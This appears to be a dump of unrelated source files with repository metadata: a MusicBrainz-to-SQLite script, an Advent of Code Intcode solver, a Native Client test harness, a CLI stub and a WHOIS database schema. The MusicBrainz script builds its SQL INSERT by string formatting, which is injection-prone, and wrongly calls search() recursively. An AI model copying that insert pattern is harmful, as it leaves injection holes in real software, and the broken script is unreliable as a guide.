] | 67 | 2017-09-11T05:06:12.000Z | 2022-02-14T04:44:04.000Z | Ago-Dic-2019/ERIK EDUARDO MONTOYA MARTINEZ/2doParcial/ApiMusicbrainz.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z | import sqlite3
import pprint
import musicbrainzngs
from ObjetoArtista import Artista
def search():
musicbrainzngs.set_useragent('musicbrainzngs', '2.0')
Art = musicbrainzngs.search_artists(area='Los Angeles', tag='[rock,metal]', country="US", limit=100)
j = 0
for i in Art['artist-list']:
id2 = Art['artist-list'][j]['id']
nombre = Art['artist-list'][j]['name']
area = Art['artist-list'][j]['area']['name']
sortname = Art['artist-list'][j]['sort-name']
eScore = Art['artist-list'][j]['ext:score']
tipoC = Art['artist-list'][j]['area']['type']
j = j+1
art = search(id=j,nombre=nombre,area=area,sort=sortname,id2=id2,eScore=eScore,tipoC=tipoC)
save(art)
def save(arti):
try:
conexion = sqlite3.connect('musicbrainzDB.db')
cursor = conexion.cursor()
cursor.execute(
"INSERT INTO Artistas VALUES ('{}','{}','{}','{}','{}','{}','{}')".format(arti._id,arti._nombre,arti._area,arti._sortname,arti._eScore,arti._tipoC,arti._id2))
conexion.commit()
cursor.close()
except sqlite3.Error as error:
print('Error con la conexión!', error)
finally:
if (conexion):
conexion.close()
print('Conexión a SQLite cerrada\n')
def main():
search()
if __name__ == '__main__':
main() | 31.022727 | 170 | 0.594872 |
e5ea2e1bf84a5f473d865d02f893af7632634567 | 6,335 | py | Python | 2019/day17/day17.py | mdelmage/advent2019 | eae18fd8010c9816b22578d6eb8988139aef131d | [
"MIT"
] | 2 | 2020-12-02T20:44:33.000Z | 2020-12-09T23:35:35.000Z | 2019/day17/day17.py | mdelmage/advent2019 | eae18fd8010c9816b22578d6eb8988139aef131d | [
"MIT"
] | null | null | null | 2019/day17/day17.py | mdelmage/advent2019 | eae18fd8010c9816b22578d6eb8988139aef131d | [
"MIT"
] | null | null | null | #!/usr/bin/python
# coding: utf-8
import copy
from collections import namedtuple
WAKEUP_ADDR = 0
WAKEUP_CMD = 2
class IntcodeNode:
Pointer = namedtuple('Pointer', 'address value')
OPCODE_ADD = 1
OPCODE_MULTIPLY = 2
OPCODE_INPUT = 3
OPCODE_OUTPUT = 4
OPCODE_JIT = 5
OPCODE_JIF = 6
OPCODE_LT = 7
OPCODE_EQ = 8
OPCODE_RELATIVE = 9
OPCODE_HALT = 99
ADDRESS_POSITION = 0
ADDRESS_IMMEDIATE = 1
ADDRESS_RELATIVE = 2
opcode_lengths = { OPCODE_ADD : 4,
OPCODE_MULTIPLY : 4,
OPCODE_INPUT : 2,
OPCODE_OUTPUT : 2,
OPCODE_JIT : 0,
OPCODE_JIF : 0,
OPCODE_LT : 4,
OPCODE_EQ : 4,
OPCODE_RELATIVE : 2,
OPCODE_HALT : 0 }
def __init__(self, program):
self.program = copy.deepcopy(program)
self.relative_base = 0
self.pc = 0
self.output = []
# Day 17-specific attributes
self.x = 0
self.y = 0
self.map = {}
self.dust = None
# Main routine, Functions A,B,C and video feed options
main = "A,C,A,C,B,B,C,A,C,B\n"
func_a = "L,8,R,12,R,12,R,10\n"
func_b = "L,10,R,10,L,6\n"
func_c = "R,10,R,12,R,10\n"
video = "n\n"
self.input = main + func_a + func_b + func_c + video
self.input_index = 0
def read(self, address):
if address in self.program:
return self.program[address]
else:
return 0
def write(self, address, value):
self.program[address] = value
def parameter(self, address, mode):
param = 0
# Use exceptions to simplify command processing.
# Shorter opcodes may dereference invalid memory
# when calculating extra params.
try:
if self.ADDRESS_POSITION == mode:
# Return (parameter, *parameter)
param = self.Pointer(self.read(self.pc + address), self.read(self.read(self.pc + address)))
elif self.ADDRESS_IMMEDIATE == mode:
# Return (¶meter, parameter)
param = self.Pointer(self.pc + address, self.read(self.pc + address))
elif self.ADDRESS_RELATIVE == mode:
# Return (parameter + relative base, *(parameter + relative base)
param = self.Pointer(self.read(self.pc + address) + self.relative_base, self.read(self.read(self.pc + address) + self.relative_base))
else:
print "Unknown parameter mode {0}!".format(mode)
except:
pass
return param
def execute(self):
while self.read(self.pc) != self.OPCODE_HALT:
instruction = self.read(self.pc)
opcode = instruction % 100
param1_mode = (instruction / 100) % 10
param2_mode = (instruction / 1000) % 10
param3_mode = (instruction / 10000) % 10
param1 = self.parameter(1, param1_mode)
param2 = self.parameter(2, param2_mode)
param3 = self.parameter(3, param3_mode)
if self.OPCODE_ADD == opcode:
self.write(param3.address, param1.value + param2.value)
elif self.OPCODE_MULTIPLY == opcode:
self.write(param3.address, param1.value * param2.value)
elif self.OPCODE_INPUT == opcode:
self.write(param1.address, ord(self.input[self.input_index]))
self.input_index += 1
elif self.OPCODE_OUTPUT == opcode:
if param1.value > 256:
self.dust = param1.value
else:
self.map[(self.x, self.y)] = param1.value
if ord('\n') == param1.value:
self.x = 0
self.y += 1
print ""
else:
self.x += 1
print chr(param1.value),
elif self.OPCODE_JIT == opcode:
self.pc = param2.value if param1.value != 0 else self.pc + 3
elif self.OPCODE_JIF == opcode:
self.pc = param2.value if param1.value == 0 else self.pc + 3
elif self.OPCODE_LT == opcode:
self.write(param3.address, 1 if param1.value < param2.value else 0)
elif self.OPCODE_EQ == opcode:
self.write(param3.address, 1 if param1.value == param2.value else 0)
elif self.OPCODE_RELATIVE == opcode:
self.relative_base += param1.value
else:
print "Unknown opcode {0} @ PC {1} RB {2}!".format(opcode, self.pc, self.relative_base)
break
self.pc += self.opcode_lengths[opcode]
#print "halt @ PC {0} ({1})".format(self.pc, self.read(self.pc))
# Open input file
with open("day17.txt", "r") as f:
for line in f:
i = 0
program = {}
for item in line.strip().split(","):
program[i] = int(item)
i += 1
# Phase I: Produce a map with Intcode program
program[WAKEUP_ADDR] = WAKEUP_CMD
node = IntcodeNode(program)
node.execute()
# Count the intersections
alignment_sum = 0
for location in node.map:
if ord('#') == node.map[location]:
if (location[0] + 1, location[1] + 0) in node.map and \
(location[0] + 0, location[1] + 1) in node.map and \
(location[0] - 1, location[1] + 0) in node.map and \
(location[0] + 0, location[1] - 1) in node.map and \
ord('#') == node.map[(location[0] + 1, location[1] + 0)] and \
ord('#') == node.map[(location[0] + 0, location[1] + 1)] and \
ord('#') == node.map[(location[0] - 1, location[1] + 0)] and \
ord('#') == node.map[(location[0] + 0, location[1] - 1)]:
alignment_sum += (location[0] * location[1])
print "Sum of alignment parameters is {0}.".format(alignment_sum)
print "Dust collected: {0}".format(node.dust) | 37.264706 | 149 | 0.513181 |
89889a3c22c80d57c8a6e52e2ef51e20c48ce2ad | 24,593 | py | Python | tools/command_tester.py | kapkic/native_client | 51c8bc8c249d55606232ae011bdfc8b4cab3d794 | [
"BSD-3-Clause"
] | 1 | 2021-12-23T00:36:43.000Z | 2021-12-23T00:36:43.000Z | tools/command_tester.py | kapkic/native_client | 51c8bc8c249d55606232ae011bdfc8b4cab3d794 | [
"BSD-3-Clause"
] | null | null | null | tools/command_tester.py | kapkic/native_client | 51c8bc8c249d55606232ae011bdfc8b4cab3d794 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python2
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple testing harness for running commands and checking expected output.
This harness is used instead of shell scripts to ensure windows compatibility
"""
# python2 imports
import getopt
import os
import re
import sys
# local imports
import test_lib
GlobalPlatform=None # for pychecker, initialized in ProcessOptions
GlobalReportStream = [sys.stdout]
GlobalSettings = {}
# Hook print to we can print to both stdout and a file
def Print(message):
for s in GlobalReportStream:
print >>s, message
def Banner(message):
Print('=' * 70)
print(message)
print('=' * 70)
def DifferentFromGolden(actual, golden, output_type):
"""Compares actual output against golden output.
If there are any differences, output an error message (to stdout) with
appropriate banners.
Args:
actual: actual output from the program under test, as a single
string.
golden: expected output from the program under test, as a single
string.
output_type: the name / title for the output type being compared.
Used in banner output.
Returns:
True when there is a difference, False otherwise.
"""
diff = list(test_lib.DiffStringsIgnoringWhiteSpace(golden, actual))
diff = '\n'.join(diff)
if diff:
Banner('Error %s diff found' % output_type)
Print(diff)
Banner('Potential New Golden Output')
Print(actual)
return True
return False
def ResetGlobalSettings():
global GlobalSettings
GlobalSettings = {
'exit_status': 0,
'using_nacl_signal_handler': False,
# When declares_exit_status is set, we read the expected exit
# status from stderr. We look for a line of the form
# "** intended_exit_status=X". This allows crash tests to
# declare their expected exit status close to where the crash is
# generated, rather than in a Scons file. It reduces the risk
# that the test passes accidentally by crashing during setup.
'declares_exit_status': False,
# List of environment variables to set.
'osenv': '',
'arch': None,
'subarch': None,
# An environment description that should include all factors that may
# affect tracked performance. Used to compare different environments.
'perf_env_description': None,
# Track total time taken for the command: '0' or '1'.
'track_cmdtime': '0',
'name': None,
'report': None,
'stdin': None,
'log_file': None,
'stdout_golden': None,
'stderr_golden': None,
'log_golden': None,
# This option must be '1' for the output to be captured, for checking
# against golden files, special exit_status signals, etc.
# When this option is '0', stdout and stderr will be streamed out.
'capture_output': '1',
'filter_regex': None,
'filter_inverse': False,
'filter_group_only': False,
# Number of times a test is run.
# This is useful for getting multiple samples for time perf tests.
'num_runs': 1,
# Scripts for processing output along with its arguments.
# This script is given the output of a single run.
'process_output_single': None,
# This script is given the concatenated output of all |num_runs|, after
# having been filtered by |process_output_single| for individual runs.
'process_output_combined': None,
'time_warning': 0,
'time_error': 0,
'run_under': None,
}
def StringifyList(lst):
return ','.join(lst)
def DestringifyList(lst):
# BUG(robertm): , is a legitimate character for an environment variable
# value.
return lst.split(',')
# The following messages match gtest's formatting. This improves log
# greppability for people who primarily work on Chrome. It also allows
# gtest-specific hooks on the buildbots to fire.
# The buildbots expect test names in the format "suite_name.test_name", so we
# prefix the test name with a bogus suite name (nacl).
def RunMessage():
return '[ RUN ] %s' % (GlobalSettings['name'],)
def FailureMessage(total_time):
return '[ FAILED ] %s (%d ms)' % (GlobalSettings['name'],
total_time * 1000.0)
def SuccessMessage(total_time):
return '[ OK ] %s (%d ms)' % (GlobalSettings['name'],
total_time * 1000.0)
def LogPerfResult(graph_name, trace_name, value, units):
# NOTE: This RESULT message is parsed by Chrome's perf graph generator.
Print('RESULT %s: %s= %s %s' %
(graph_name, trace_name, value, units))
def PrintTotalTime(total_time):
if int(GlobalSettings['track_cmdtime']):
LogPerfResult(GlobalSettings['name'],
'TOTAL_' + GlobalSettings['perf_env_description'],
'%f' % total_time,
'secs')
# On POSIX systems, exit() codes are 8-bit. You cannot use exit() to
# make it look like the process was killed by a signal. Instead,
# NaCl's signal handler encodes the signal number into the exit() code
# by returning with exit(-signum) or equivalently, exit((-signum) & 0xff).
def IndirectSignal(signum):
return (-signum) & 0xff
# Windows exit codes that indicate unhandled exceptions.
STATUS_ACCESS_VIOLATION = 0xc0000005
STATUS_PRIVILEGED_INSTRUCTION = 0xc0000096
STATUS_FLOAT_DIVIDE_BY_ZERO = 0xc000008e
STATUS_INTEGER_DIVIDE_BY_ZERO = 0xc0000094
# Python's wrapper for GetExitCodeProcess() treats the STATUS_* values
# as negative, although the unsigned values are used in headers and
# are more widely recognised.
def MungeWindowsErrorExit(num):
return num - 0x100000000
# If a crash occurs in x86-32 untrusted code on Windows, the kernel
# apparently gets confused about the cause. It fails to take %cs into
# account when examining the faulting instruction, so it looks at the
# wrong instruction, so we could get either of the errors below.
# See http://code.google.com/p/nativeclient/issues/detail?id=1689
win32_untrusted_crash_exit = [
MungeWindowsErrorExit(STATUS_ACCESS_VIOLATION),
MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)]
win32_sigfpe = [
MungeWindowsErrorExit(STATUS_FLOAT_DIVIDE_BY_ZERO),
MungeWindowsErrorExit(STATUS_INTEGER_DIVIDE_BY_ZERO),
]
# We patch Windows' KiUserExceptionDispatcher on x86-64 to terminate
# the process safely when untrusted code crashes. We get the exit
# code associated with the HLT instruction.
win64_exit_via_ntdll_patch = [
MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)]
# Mach exception code for Mac OS X.
EXC_BAD_ACCESS = 1
# 32-bit processes on Mac OS X return SIGBUS in most of the cases where Linux
# returns SIGSEGV, except for actual x86 segmentation violations. 64-bit
# processes on Mac OS X behave differently.
status_map = {
'sigtrap' : {
'linux2': [-5], # SIGTRAP
'darwin': [-5], # SIGTRAP
},
'trusted_sigabrt' : {
'linux2': [-6], # SIGABRT
'mac32': [-6], # SIGABRT
'mac64': [-6], # SIGABRT
# On Windows, NaClAbort() exits using the HLT instruction.
'win32': [MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)],
'win64': [MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)],
},
'naclabort_coverage' : {
# This case is here because NaClAbort() behaves differently when
# code coverage is enabled.
# This is not used on Windows.
'linux2': [IndirectSignal(6)], # SIGABRT
'mac32': [IndirectSignal(6)], # SIGABRT
'mac64': [IndirectSignal(6)], # SIGABRT
},
'sigpipe': {
# This is not used on Windows because Windows does not have an
# equivalent of SIGPIPE.
'linux2': [-13], # SIGPIPE
'mac32': [-13], # SIGPIPE
'mac64': [-13], # SIGPIPE
},
'untrusted_sigsegv': {
'linux2': [-11], # SIGSEGV
'mac32': [-11], # SIGSEGV
'mac64': [-11], # SIGSEGV
'win32': win32_untrusted_crash_exit,
'win64': win64_exit_via_ntdll_patch,
},
'untrusted_sigill' : {
'linux2': [-4], # SIGILL
'mac32': [-4], # SIGILL
'mac64': [-4], # SIGILL
'win32': win32_untrusted_crash_exit,
'win64': win64_exit_via_ntdll_patch,
},
'untrusted_sigfpe' : {
'linux2': [-8], # SIGFPE
'mac32': [-8], # SIGFPE
'mac64': [-8], # SIGFPE
'win32': win32_sigfpe,
'win64': win64_exit_via_ntdll_patch,
},
'untrusted_segfault': {
'linux2': [-11], # SIGSEGV
'mac32': [-10], # SIGBUS
'mac64': [-10], # SIGBUS
'mach_exception': EXC_BAD_ACCESS,
'win32': win32_untrusted_crash_exit,
'win64': win64_exit_via_ntdll_patch,
},
'untrusted_sigsegv_or_equivalent': {
'linux2': [-11], # SIGSEGV
'mac32': [-11], # SIGSEGV
'mac64': [-10], # SIGBUS
'win32': win32_untrusted_crash_exit,
'win64': win64_exit_via_ntdll_patch,
},
'trusted_segfault': {
'linux2': [-11], # SIGSEGV
'mac32': [-10], # SIGBUS
'mac64': [-11], # SIGSEGV
'mach_exception': EXC_BAD_ACCESS,
'win32': [MungeWindowsErrorExit(STATUS_ACCESS_VIOLATION)],
'win64': [MungeWindowsErrorExit(STATUS_ACCESS_VIOLATION)],
},
'trusted_sigsegv_or_equivalent': {
'linux2': [-11], # SIGSEGV
'mac32': [-11], # SIGSEGV
'mac64': [-11], # SIGSEGV
'win32': [],
'win64': [],
},
# This is like 'untrusted_segfault', but without the 'untrusted_'
# prefix which marks the status type as expecting a
# gracefully-printed exit message from nacl_signal_common.c. This
# is a special case because we use different methods for writing
# the exception stack frame on different platforms. On Mac and
# Windows, NaCl uses a system call which will detect unwritable
# pages, so the exit status appears as an unhandled fault from
# untrusted code. On Linux, NaCl's signal handler writes the
# frame directly, so the exit status comes from getting a SIGSEGV
# inside the SIGSEGV handler.
'unwritable_exception_stack': {
'linux2': [-11], # SIGSEGV
'mac32': [-10], # SIGBUS
'mac64': [-10], # SIGBUS
'win32': win32_untrusted_crash_exit,
'win64': win64_exit_via_ntdll_patch,
},
}
def ProcessOptions(argv):
global GlobalPlatform
"""Process command line options and return the unprocessed left overs."""
ResetGlobalSettings()
try:
opts, args = getopt.getopt(argv, '', [x + '=' for x in GlobalSettings])
except getopt.GetoptError, err:
Print(str(err)) # will print something like 'option -a not recognized'
sys.exit(1)
for o, a in opts:
# strip the leading '--'
option = o[2:]
assert option in GlobalSettings
if option == 'exit_status':
GlobalSettings[option] = a
elif type(GlobalSettings[option]) == int:
GlobalSettings[option] = int(a)
else:
GlobalSettings[option] = a
if (sys.platform == 'win32') and (GlobalSettings['subarch'] == '64'):
GlobalPlatform = 'win64'
elif (sys.platform == 'darwin'):
# mac32, mac64
GlobalPlatform = 'mac' + GlobalSettings['subarch']
else:
GlobalPlatform = sys.platform
# return the unprocessed options, i.e. the command
return args
# Parse output for signal type and number
#
# The '** Signal' output is from the nacl signal handler code.
#
# Since it is possible for there to be an output race with another
# thread, or additional output due to atexit functions, we scan the
# output in reverse order for the signal signature.
def GetNaClSignalInfoFromStderr(stderr):
lines = stderr.splitlines()
# Scan for signal msg in reverse order
for curline in reversed(lines):
match = re.match('\*\* (Signal|Mach exception) (\d+) from '
'(trusted|untrusted) code', curline)
if match is not None:
return match.group(0)
return None
def GetQemuSignalFromStderr(stderr, default):
for line in reversed(stderr.splitlines()):
# Look for 'qemu: uncaught target signal XXX'.
words = line.split()
if (len(words) > 4 and
words[0] == 'qemu:' and words[1] == 'uncaught' and
words[2] == 'target' and words[3] == 'signal'):
return -int(words[4])
return default
def FormatExitStatus(number):
# Include the hex version because it makes the Windows error exit
# statuses (STATUS_*) more recognisable.
return '%i (0x%x)' % (number, number & 0xffffffff)
def PrintStdStreams(stdout, stderr):
if stderr is not None:
Banner('Stdout for %s:' % os.path.basename(GlobalSettings['name']))
Print(stdout)
Banner('Stderr for %s:' % os.path.basename(GlobalSettings['name']))
Print(stderr)
def GetIntendedExitStatuses(stderr):
statuses = []
for line in stderr.splitlines():
match = re.match(r'\*\* intended_exit_status=(.*)$', line)
if match is not None:
statuses.append(match.group(1))
return statuses
def CheckExitStatus(failed, req_status, using_nacl_signal_handler,
exit_status, stdout, stderr):
if GlobalSettings['declares_exit_status']:
assert req_status == 0
intended_statuses = GetIntendedExitStatuses(stderr)
if len(intended_statuses) == 0:
Print('\nERROR: Command returned exit status %s but did not output an '
'intended_exit_status line to stderr - did it exit too early?'
% FormatExitStatus(exit_status))
return False
elif len(intended_statuses) != 1:
Print('\nERROR: Command returned exit status %s but produced '
'multiple intended_exit_status lines (%s)'
% (FormatExitStatus(exit_status), ', '.join(intended_statuses)))
return False
else:
req_status = intended_statuses[0]
expected_sigtype = 'normal'
if req_status in status_map:
expected_statuses = status_map[req_status][GlobalPlatform]
if using_nacl_signal_handler:
if req_status.startswith('trusted_'):
expected_sigtype = 'trusted'
elif req_status.startswith('untrusted_'):
expected_sigtype = 'untrusted'
else:
expected_statuses = [int(req_status)]
expected_printed_status = None
if expected_sigtype != 'normal':
if sys.platform == 'darwin':
# Mac OS X
default = '<mach_exception field missing for %r>' % req_status
expected_printed_status = '** Mach exception %s from %s code' % (
status_map.get(req_status, {}).get('mach_exception', default),
expected_sigtype)
else:
# Linux
assert sys.platform != 'win32'
assert len(expected_statuses) == 1
assert expected_statuses[0] < 0
expected_printed_signum = -expected_statuses[0]
expected_printed_status = '** Signal %d from %s code' % (
expected_printed_signum,
expected_sigtype)
expected_statuses = [IndirectSignal(expected_printed_signum)]
# If an uncaught signal occurs under QEMU (on ARM), the exit status
# contains the signal number, mangled as per IndirectSignal(). We
# extract the unadulterated signal number from QEMU's log message in
# stderr instead. If we are not using QEMU, or no signal is raised
# under QEMU, this is a no-op.
if stderr is not None:
exit_status = GetQemuSignalFromStderr(stderr, exit_status)
msg = '\nERROR: Command returned exit status %s but we expected %s' % (
FormatExitStatus(exit_status),
' or '.join(FormatExitStatus(value) for value in expected_statuses))
if exit_status not in expected_statuses:
Print(msg)
failed = True
if using_nacl_signal_handler and stderr is not None:
actual_printed_status = GetNaClSignalInfoFromStderr(stderr)
msg = ('\nERROR: Command printed the signal info %r to stderr '
'but we expected %r' %
(actual_printed_status, expected_printed_status))
if actual_printed_status != expected_printed_status:
Print(msg)
failed = True
return not failed
def CheckTimeBounds(total_time):
if GlobalSettings['time_error']:
if total_time > GlobalSettings['time_error']:
Print('ERROR: should have taken less than %f secs' %
(GlobalSettings['time_error']))
return False
if GlobalSettings['time_warning']:
if total_time > GlobalSettings['time_warning']:
Print('WARNING: should have taken less than %f secs' %
(GlobalSettings['time_warning']))
return True
def CheckGoldenOutput(stdout, stderr):
for (stream, getter) in [
('stdout', lambda: stdout),
('stderr', lambda: stderr),
('log', lambda: open(GlobalSettings['log_file']).read()),
]:
golden = stream + '_golden'
if GlobalSettings[golden]:
golden_data = open(GlobalSettings[golden]).read()
actual = getter()
if GlobalSettings['filter_regex']:
actual = test_lib.RegexpFilterLines(GlobalSettings['filter_regex'],
GlobalSettings['filter_inverse'],
GlobalSettings['filter_group_only'],
actual)
if DifferentFromGolden(actual, golden_data, stream):
return False
return True
def ProcessLogOutputSingle(stdout, stderr):
output_processor = GlobalSettings['process_output_single']
if output_processor is None:
return (True, stdout, stderr)
else:
output_processor_cmd = DestringifyList(output_processor)
# Also, get the output from log_file to get NaClLog output in Windows.
log_output = open(GlobalSettings['log_file']).read()
# Assume the log processor does not care about the order of the lines.
all_output = log_output + stdout + stderr
_, retcode, failed, new_stdout, new_stderr = \
test_lib.RunTestWithInputOutput(output_processor_cmd, all_output)
# Print the result, since we have done some processing and we need
# to have the processed data. However, if we intend to process it some
# more later via process_output_combined, do not duplicate the data here.
# Only print out the final result!
if not GlobalSettings['process_output_combined']:
PrintStdStreams(new_stdout, new_stderr)
if retcode != 0 or failed:
return (False, new_stdout, new_stderr)
else:
return (True, new_stdout, new_stderr)
def ProcessLogOutputCombined(stdout, stderr):
output_processor = GlobalSettings['process_output_combined']
if output_processor is None:
return True
else:
output_processor_cmd = DestringifyList(output_processor)
all_output = stdout + stderr
_, retcode, failed, new_stdout, new_stderr = \
test_lib.RunTestWithInputOutput(output_processor_cmd, all_output)
# Print the result, since we have done some processing.
PrintStdStreams(new_stdout, new_stderr)
if retcode != 0 or failed:
return False
else:
return True
def DoRun(command, stdin_data):
"""
Run the command, given stdin_data. Returns a return code (0 is good)
and optionally a captured version of stdout, stderr from the run
(if the global setting capture_output is true).
"""
# Initialize stdout, stderr to indicate we have not captured
# any of stdout or stderr.
stdout = ''
stderr = ''
if not int(GlobalSettings['capture_output']):
# We are only blurting out the stdout and stderr, not capturing it
# for comparison, etc.
assert (not GlobalSettings['stdout_golden']
and not GlobalSettings['stderr_golden']
and not GlobalSettings['log_golden']
and not GlobalSettings['filter_regex']
and not GlobalSettings['filter_inverse']
and not GlobalSettings['filter_group_only']
and not GlobalSettings['process_output_single']
and not GlobalSettings['process_output_combined']
)
# If python2 ever changes popen.stdout.read() to not risk deadlock,
# we could stream and capture, and use RunTestWithInputOutput instead.
(total_time, exit_status, failed) = test_lib.RunTestWithInput(command,
stdin_data)
PrintTotalTime(total_time)
if not CheckExitStatus(failed,
GlobalSettings['exit_status'],
GlobalSettings['using_nacl_signal_handler'],
exit_status, None, None):
Print(FailureMessage(total_time))
return (1, stdout, stderr)
else:
(total_time, exit_status,
failed, stdout, stderr) = test_lib.RunTestWithInputOutput(
command, stdin_data)
PrintTotalTime(total_time)
# CheckExitStatus may spew stdout/stderr when there is an error.
# Otherwise, we do not spew stdout/stderr in this case (capture_output).
if not CheckExitStatus(failed,
GlobalSettings['exit_status'],
GlobalSettings['using_nacl_signal_handler'],
exit_status, stdout, stderr):
PrintStdStreams(stdout, stderr)
Print(FailureMessage(total_time))
return (1, stdout, stderr)
if not CheckGoldenOutput(stdout, stderr):
Print(FailureMessage(total_time))
return (1, stdout, stderr)
success, stdout, stderr = ProcessLogOutputSingle(stdout, stderr)
if not success:
Print(FailureMessage(total_time) + ' ProcessLogOutputSingle failed!')
return (1, stdout, stderr)
if not CheckTimeBounds(total_time):
Print(FailureMessage(total_time))
return (1, stdout, stderr)
Print(SuccessMessage(total_time))
return (0, stdout, stderr)
def DisableCrashDialog():
"""
Disable Windows' crash dialog box, which pops up when a process exits with
an unhandled fault. This causes the process to hang on the Buildbots. We
duplicate this function from SConstruct because ErrorMode flags are
overwritten in scons due to race conditions. See bug
https://code.google.com/p/nativeclient/issues/detail?id=2968
"""
if sys.platform == 'win32':
import win32api
import win32con
# The double call is to preserve existing flags, as discussed at
# http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx
new_flags = win32con.SEM_NOGPFAULTERRORBOX
existing_flags = win32api.SetErrorMode(new_flags)
win32api.SetErrorMode(existing_flags | new_flags)
def Main(argv):
DisableCrashDialog()
command = ProcessOptions(argv)
if GlobalSettings['report']:
GlobalReportStream.append(open(GlobalSettings['report'], 'w'))
if not GlobalSettings['name']:
GlobalSettings['name'] = command[0]
GlobalSettings['name'] = os.path.basename(GlobalSettings['name'])
Print(RunMessage())
num_runs = GlobalSettings['num_runs']
if num_runs > 1:
Print(' (running %d times)' % num_runs)
if GlobalSettings['osenv']:
Banner('setting environment')
env_vars = DestringifyList(GlobalSettings['osenv'])
else:
env_vars = []
for env_var in env_vars:
key, val = env_var.split('=', 1)
Print('[%s] = [%s]' % (key, val))
os.environ[key] = val
stdin_data = ''
if GlobalSettings['stdin']:
stdin_data = open(GlobalSettings['stdin'])
run_under = GlobalSettings['run_under']
if run_under:
command = run_under.split(',') + command
Banner('running %s' % str(command))
# print the command in copy-and-pastable fashion
print ' '.join(env_vars + command)
# Concatenate output when running multiple times (e.g., for timing).
combined_stdout = ''
combined_stderr = ''
cur_runs = 0
num_runs = GlobalSettings['num_runs']
while cur_runs < num_runs:
cur_runs += 1
# Clear out previous log_file.
if GlobalSettings['log_file']:
try:
os.unlink(GlobalSettings['log_file']) # might not pre-exist
except OSError:
pass
ret_code, stdout, stderr = DoRun(command, stdin_data)
if ret_code != 0:
return ret_code
combined_stdout += stdout
combined_stderr += stderr
# Process the log output after all the runs.
success = ProcessLogOutputCombined(combined_stdout, combined_stderr)
if not success:
# Bogus time, since only ProcessLogOutputCombined failed.
Print(FailureMessage(0.0) + ' ProcessLogOutputCombined failed!')
return 1
return 0
if __name__ == '__main__':
retval = Main(sys.argv[1:])
# Add some whitepsace to make the logs easier to read.
sys.stdout.write('\n\n')
sys.exit(retval)
| 35.487734 | 80 | 0.668524 |
338e2e07ba4bd3ae471d823f71896f1a121927ab | 402 | py | Python | ravengis/cli.py | Zeitsperre/RavenGIS | 730a82a8be0549fb5b954d7cbc0a2984fb2be86f | [
"MIT"
] | 2 | 2021-08-05T14:20:58.000Z | 2021-08-06T00:01:46.000Z | ravengis/cli.py | Zeitsperre/RavenGIS | 730a82a8be0549fb5b954d7cbc0a2984fb2be86f | [
"MIT"
] | null | null | null | ravengis/cli.py | Zeitsperre/RavenGIS | 730a82a8be0549fb5b954d7cbc0a2984fb2be86f | [
"MIT"
] | null | null | null | """Console script for ravengis."""
import sys
import click
@click.command()
def main(args=None):
"""Console script for ravengis."""
click.echo("Replace this message by putting your code into "
"ravengis.cli.main")
click.echo("See click documentation at https://click.palletsprojects.com/")
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 23.647059 | 79 | 0.664179 |
927433524f0d1e5ce2fbc85d5f398f774df8f448 | 2,161 | py | Python | PyFunceble/engine/database/schemas/whois_record.py | fossabot/PyFunceble | 4335cb31e6cf20cf8e10dd2cc6ac3afa50199ea4 | [
"Apache-2.0"
] | null | null | null | PyFunceble/engine/database/schemas/whois_record.py | fossabot/PyFunceble | 4335cb31e6cf20cf8e10dd2cc6ac3afa50199ea4 | [
"Apache-2.0"
] | null | null | null | PyFunceble/engine/database/schemas/whois_record.py | fossabot/PyFunceble | 4335cb31e6cf20cf8e10dd2cc6ac3afa50199ea4 | [
"Apache-2.0"
] | null | null | null | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the schema of our "whois_record" table.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/master/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020 Nissar Chababy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from sqlalchemy import Column, Integer, String, Text
from ..loader.base_class import DatabaseBase
class WhoisRecord(DatabaseBase):
"""
Provides the schema of our whois_record table.
"""
subject = Column(Text, nullable=False, unique=True)
expiration_date = Column(Text, nullable=False)
epoch = Column(Integer, nullable=False)
state = Column(String(80), nullable=False)
record = Column(Text, nullable=True)
server = Column(Text, nullable=True)
| 31.318841 | 88 | 0.552059 |
dfa6b37e338aeee385a9b1ec65640ad438620a7a | 11,268 | py | Python | proxyshell_mod.py | aravazhimdr/ProxyShell-POC-Mod | 03646720306b5dcd544c0a29388bda98020a07f0 | [
"MIT"
